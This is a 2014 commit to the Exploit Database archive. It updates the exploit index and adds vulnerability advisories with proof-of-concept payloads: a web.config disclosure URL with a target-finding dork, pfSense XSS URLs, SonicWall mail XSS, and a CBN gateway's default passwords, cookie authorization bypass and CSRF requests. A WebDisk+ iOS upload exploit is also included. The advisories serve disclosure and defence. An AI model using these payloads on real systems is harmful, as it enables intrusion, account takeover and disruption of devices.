Updated 10_29_2014

This commit is contained in:
Offensive Security 2014-10-29 04:45:11 +00:00
parent 09774073e6
commit 1709d70e04
26 changed files with 2081 additions and 0 deletions

View file

@ -31149,6 +31149,7 @@ id,file,description,date,author,platform,type,port
34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0
34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0
34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
@ -31197,6 +31198,7 @@ id,file,description,date,author,platform,type,port
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0
34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
@ -31264,6 +31266,7 @@ id,file,description,date,author,platform,type,port
34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0
34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0
34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
@ -31446,6 +31449,7 @@ id,file,description,date,author,platform,type,port
34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0
34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0
34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0
@ -31485,6 +31489,7 @@ id,file,description,date,author,platform,type,port
34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0
34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0
34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0
34965,platforms/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple CSRF Vulnerabilities",2014-10-14,"Krusty Hack",php,webapps,0
34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0
34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
34968,platforms/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps,0
@ -31560,6 +31565,8 @@ id,file,description,date,author,platform,type,port
35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0
35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0
35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF",2014-10-23,"Emmanuel Law",php,webapps,0
35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall GMS 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0
35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
35050,platforms/php/webapps/35050.txt,"Alguest 1.1 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0
@ -31572,6 +31579,24 @@ id,file,description,date,author,platform,type,port
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0
35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 'pluginurl' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
35068,platforms/hardware/remote/35068.txt,"pfSense pkg_edit.php id Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35069,platforms/hardware/remote/35069.txt,"pfSense pkg.php xml Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35070,platforms/hardware/remote/35070.txt,"pfSense status_graph.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35071,platforms/hardware/remote/35071.txt,"pfSense interfaces.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35072,platforms/php/webapps/35072.txt,"Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps,0
35073,platforms/php/webapps/35073.txt,"Wordpress CP Multi View Event Calendar 1.01 - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0

Can't render this file because it is too large.

39
platforms/asp/webapps/34920.txt Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: HttpCombiner ASP.NET Remote File Disclosure Vulnerability
# Google Dork: [filetype:txt intext:HttpCombiner.ashx]
# Date: 2014-10-10
# Exploit Author: Hoang Anh Thai
# Vendor Homepage: https://myfirstsamplepagebyilyasforassign.googlecode.com/files/HttpCombiner-v1.zip
# Reference: http://www.codeproject.com/KB/aspnet/HttpCombine.aspx
# Affected Versions: HttpCombiner v1.0
# Tested on: Windows 7 / Chrome & Internet Explorer
Description:
============
An HTTP handler that combines multiple CSS, Javascript or URL into one response for faster page load. It can combine, compress and cache response which results in faster page load and better scalability of web application
It's a good practice to use many small Javascript and CSS files instead of one large Javascript/CSS file for better code maintainability, but bad in terms of website performance. Although you should write your Javascript code in small files and break large CSS files into small chunks but when browser requests those javascript and css files, it makes one Http request per file. Every Http Request results in a network roundtrip form your browser to the server and the delay in reaching the server and coming back to the browser is called latency. So, if you have four javascripts and three css files loaded by a page, you are wasting time in seven network roundtrips. Within USA, latency is average 70ms. So, you waste 7x70 = 490ms, about half a second of delay. Outside USA, average latency is around 200ms. So, that means 1400ms of waiting. Browser cannot show the page properly until Css and Javascripts are fully loaded. So, the more latency you have, the slower page loads.
You can reduce the wait time by using a CDN. Read my previous blog post about using CDN. However, a better solution is to deliver multiple files over one request using an HttpHandler that combines several files and delivers as one output. So, instead of putting many <script> or <link> tag, you just put one <script> and one <link> tag, and point them to the HttpHandler. You tell the handler which files to combine and it delivers those files in one response. This saves browser from making many requests and eliminates the latency.
This Http Handler reads the file names defined in a configuration and combines all those files and delivers as one response. It delivers the response as gzip compressed to save bandwidth. Moreover, it generates proper cache header to cache the response in browser cache, so that, browser does not request it again on future visit.
PoC:
===
Google search: [inurl:robots.txt intext:HttpCombiner.ashx]
Result: The robots.txt file contains information "...Disallow: /css/HttpCombiner.ashx..."
Exploit view source web.config: http://[host]/css/HttpCombiner.ashx?s=~/web.config&t=text/xml
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: securitydaily.net
CONTACT: whitehat@hotmail.com

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

View file

@ -0,0 +1,199 @@
Document Title:
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1222
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
====================================
1222
Common Vulnerability Scoring System:
====================================
3
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the official DELL SonicWall GMS v7.2.x appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL
Product: SonicWall GMS Networks Appliance Application 7.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official DELL SonicWall GMS v7.2.x appliance web-application.
The security issue allows remote attackers with low privileged user account to inject own malicious script codes to the application-side
of the vulnerable service module.
The vulnerability is located in the `Console > Management > Settings > GMS Settings` module. Remote attackers and low privileged web-application
user accounts are able to inject own malicious script code context as notification value. The vulnerable user context with log files or information
notification messages (input) will be send to the internal web-server through the firewall. The data of the POST method request in the input, executes
without a secure encoding or a restriction on the input in the web-application appliance. The persistent execution of the script code occurs in the mail
notification that gets send by the appliances directly to users or via the interval count. In case of the second provided scenario the application generated
a pdf report with malicious script code in the mail body message.
The issue impact a risk to the full appliance web-application get compromised beause the send mail notifications is wrong encoded and the internal encode is
broken too. Regular the stored values must be secure encoded and parsed to prevent persistent executions in the appliance mails. The attack vector is persistent
on the application-side of the vulnerable service and the request method to inject the payload is POST.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of the vulnerability results
in session hijacking, persistent phishing attacks, persistent external redirect via mail and persistent manipulation of affected or connected module context.
Vulnerable Module(s):
[+] Console > Management > Settings > GMS Settings
Vulnerable Parameter(s):
[+] message body > table
Affected Service(s):
[+] admin@sonicwall.com (test > livedemo-admin@sonicwall.com)
Note: All other modules sending user values of non restricted input throught the appliance back. (logs, updates ...)
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Information of requirements:
- The template to send notification alerts needs to be send to the
Default html (example: http://gms.demo.sonicwall.com/sgms/auth > )
- The Console > Management > Settings section needs to be linked to the
appliance demo email address (example: livedemo-admin@sonicwall.com)
- The Alert of the notification with the pdf summery report of the
archiv needs to be redirected to the testmail like in our case
(bkm@evolution-sec.com)
PoC: message body > table
<html>
<head>
<title><iframe src=a>%20<iframe> <iframe src=a>%20<iframe></title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b><a>%20<x>
<a>%20<x></td></tr><tr><td><b>Von: </b>x@sonicwall.com</td></tr><tr><td><b>Datum: </b>07.03.2014 00:15</td></tr></table>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></table><br>
<[PERSISTENT INJECTED SCRIPT CODE!]>%20<iframe><br>
<br>
<br>
<br>
Powered by Dell SonicWALL GMS</body>
</html>
Reference(s):
http://gms.localhost:4872/sgms/
http://gms.localhost:4872/sgms/panelManager
http://gms.localhost:4872/sgms/panelManager?panelidz=1
http://gms.localhost:4872/sgms/panelManager?panelidz=1&level=1&typeOfUnits=0#
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the input values in the message body context
Filter and restrict context of send mails through the application and the web-server of the sonicwall gms appliance.
The issue has already been patched by the dell security team in cooperation with the vulnerability-lab during the year 2014.
Security Risk:
==============
The security risk of the persistent mail encoding and validation web vulnerability is estimated as medium. (CVSS 3.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

View file

@ -0,0 +1,118 @@
?
CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

223
platforms/ios/webapps/35082.txt Executable file
View file

@ -0,0 +1,223 @@
Document Title:
===============
WebDisk+ v2.1 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1349
Release Date:
=============
2014-10-23
Vulnerability Laboratory ID (VL-ID):
====================================
1349
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
WebDisk+ is a Push verion of WebDisk. It have all Full functionality of WebDisk .lets your iphone/ipad become a file website over
wi-fi netwrk.You can upload/download your document to your iphone/ipad on your pc browser over wi-fi. And it is also a document
viewer.let you direct view your document on your iphone/iphone. WebDisk+ can support Upload and download large files (More than 4GB)
form pc or other mobile device.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/webdisk+/id606709149 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-10-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AirPhoto
Product: WebDisk+ - iOS Mobile Web Application (Wifi) 2.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A code execution web vulnerability has been discovered in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application.
The vulnerability allows remote attackers to compromise the application and connected device components by exploitation
of a system specific code execution vulnerability in the wifi interface.
The vulnerability is located in the `name` input field of the wifi web interface upload module (afupload.ma). The function creates
the files without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method
request by usage of the `p & filename` parameters in the `afupload.ma` file to compromise the application or device. The execution of
the code occurs in the `afgetdir.ma` file of the wifi interface. The attack vector is located on the application-side of the mobile app
and the request method to inject/execute is GET.
The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.1.
Exploitation of the code execution vulnerability requires no privileged application user account or user interaction. Successful exploitation
of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Upload
Vulnerable File(s):
[+] afupload.ma
Vulnerable Parameter(s):
[+] p & filename
Affected Module(s):
[+] Wifi Interface (http://localhost:1861)
Proof of Concept (PoC):
=======================
The code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: (URL)
http://localhost:1861/afgetdir.ma?p=\var\mobile\Containers\Data\Application\90ACE99A-5EF3-4E3E-B509-32CCDF066AA1\Documents\
PoC: localhost:1861 - Web Interface Index
<tr><td class="tdleft"><a href=""><img class="imgthum" src="afico/files_txt.png"></a></td>
<td class="tdmid">-[CODE EXECUTION VULNERABILITY VIA GET];</td>
<td class="tdright">10-22 13:28<br/><br/>
<a href="afdelete.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C%7C-%7C467299731.txt">delete</a></td>
</tr><tr><td colspan="3" height="1"><hr class="spline" /></td>
</tr><tr></tr></table></body></html>
</iframe></td></tr>
Note:
The input field to create/upload files allows a remote attacker to execute codes directly in the web-server with multiple attack vectors.
--- PoC Session Logs (POST) ---
Status: 302[OK]
POST http://192.168.2.104:1861/afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------531465230341
Content-Disposition: form-data; name="txt"
-[CODE EXECUTION VULNERABILITY VIA GET];
-----------------------------531465230341
Content-Disposition: form-data; name="file"; filename="[PENG!]"
Content-Type: application/octet-stream
-----------------------------531465230341
Content-Disposition: form-data; name="sub"
upload
-----------------------------531465230341--]
Response Header:
Location[afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Content-Length[0]
Server[MHttpServer/1.0.0] Status: 200[OK]
GET http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3051] Mime Type[text/html]
Request Header:
Host[192.168.2.104:1861]
